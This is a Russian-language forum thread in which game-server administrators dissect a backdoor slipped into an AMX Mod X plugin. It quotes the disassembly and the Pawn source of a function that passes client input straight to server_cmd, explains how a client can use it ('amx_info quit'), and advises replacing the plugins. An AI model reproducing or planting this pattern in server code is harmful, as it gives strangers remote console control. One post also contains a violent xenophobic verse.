0x9E08 PUSH.C 0x8 0x9E10 SYSREQ.C 0x3B ; read_args(szArg[192],191) 0x9E18 STACK 0xC ; free 3 cells 0x9E20 BREAK ; admincmd.sma:1202 0x9E24 PUSH.ADR 0xFFFFFD00 ; szArg[192] 0x9E2C PUSH.C 0x4 0x9E34 SYSREQ.C 0x1E ; server_cmd(szArg[192]) 0x9E3C STACK 0x8 ; free 2 cells 0x9E44 STACK 0x300 ; free 192 cells 0x9E4C ZERO.pri 0x9E50 RETN Кстати , это смешно, но вместе с statx.amxx так же заменили и исходник :D Там, с помощью Z@C было обнаружено следующее: Цитата: public cmdSayInfo(id) { new szArg[192] read_args (szArg, 191) server_cmd(szArg) } В общем, мораль сей басни такова: Скачайте ещё раз оригинальные плагины amxx с сайта, проверьте свои и сравните на соответствие по размеру с оригиналом и замените от греха подальше 😊 PS: Кстати, проблема была вроде как-то раскрыта на http://old.thegm.ru/showthread.php?t=2231 PPS: Чудило, которые использовало и издевалось над сервером, было на этом форуме, но на данный момент уже забанено: http://www.dedicated-server.ru/vbb/member.php?u=9911 PPPS: Поскольку я не программист и далек вообще от языков программирования, объясните мне для понимая, пожалуйста, что позволяет делать заветная строка server_cmd(szArg) и эти числа 191 и 192 Update: Забыл добавить, что вероятно пароль к FTP человек получал через Psychostats
	Поблагодарили 2 раз Поблагодарили 2 раз Egorka007, ~~trollface~~

Legenda	10.5.2014, 9:53 Сообщение #16
Стаж: 16 лет Сообщений: 3619 Благодарностей: 1706 Полезность: 1010 Меценат	Код public cmdSayInfo(id) { new szArg[192] read_args (szArg, 191) server_cmd(szArg) } cmdSayInfo - это просто функция, само по себе ни чего не делает, нужно ее вызвать скорее всего что-то типа register_clcmd("amx_info", "cmdSayInfo") new szArg - создаем массив в 192 байта read_args читаем аргументы функции и пишем их в массив server_cmd выполняем в консоли сервера то, что записано в массиве amx_info quit amx_info - консольная клиентская команда, вызывает функцию cmdSayInfo quit - это аргумент команды amx_info для функции cmdSayInfo new szArg[192] - создаем переменную read_args (szArg, 191), пишем в переменную аргумент server_cmd(szArg), - в консоли сервера выполняем то, что записано в переменной можно проще бэкдоры делать
	Поблагодарили 2 раз Поблагодарили 2 раз Egorka007, Luciferr

Luciferr	10.5.2014, 9:54 Сообщение #17
Стаж: 12 лет Сообщений: 439 Благодарностей: 199 Полезность: 703	Оффтоп Я думаю мне с моим acp_bans.amxx такая проблема не грозит :)
	Поблагодарили 0 раз Поблагодарили 0 раз

walle94	10.5.2014, 10:01 Сообщение #18
Стаж: 12 лет Сообщений: 70 Благодарностей: 2 Полезность: < 0	Цитата(Legenda @ 10.5.2014, 11:53) Код public cmdSayInfo(id) { new szArg[192] read_args (szArg, 191) server_cmd(szArg) } cmdSayInfo - это просто функция, само по себе ни чего не делает, нужно ее вызвать скорее всего что-то типа register_clcmd("amx_info", "cmdSayInfo") new szArg - создаем массив в 192 байта read_args читаем аргументы функции и пишем их в массив server_cmd выполняем в консоли сервера то, что записано в массиве amx_info quit amx_info - консольная клиентская команда, вызывает функцию cmdSayInfo quit - это аргумент команды amx_info для функции cmdSayInfo new szArg[192] - создаем переменную read_args (szArg, 191), пишем в переменную аргумент server_cmd(szArg), - в консоли сервера выполняем то, что записано в переменной можно проще бэкдоры делать ну тость через ето взламывать можно?
	Поблагодарили 0 раз Поблагодарили 0 раз

Legenda	10.5.2014, 10:13 Сообщение #19
Стаж: 16 лет Сообщений: 3619 Благодарностей: 1706 Полезность: 1010 Меценат	конечно, эта функция дает доступ к консоли сервера т.е. в консоль сервера можно написать все что угодно
	Поблагодарили 0 раз Поблагодарили 0 раз

Fred Perry	10.5.2014, 10:14 Сообщение #20
Стаж: 16 лет Сообщений: 6594 Благодарностей: 2370 Полезность: 813	Цитата(walle94 @ 10.5.2014, 10:01) ну тость через ето взламывать можно? Что пишешь то и будет. Гнилой фашистской нечисти Загоним пулю в лоб, Отродью человечества Сколотим крепкий гроб!
	Поблагодарили 0 раз Поблагодарили 0 раз

« Предыдущая тема · Защита Игрового сервера · Следующая тема »

0 пользователей и 1 гостей читают эту тему:

Наши новости:

Важная информация

Взламывают, до этого такого не видел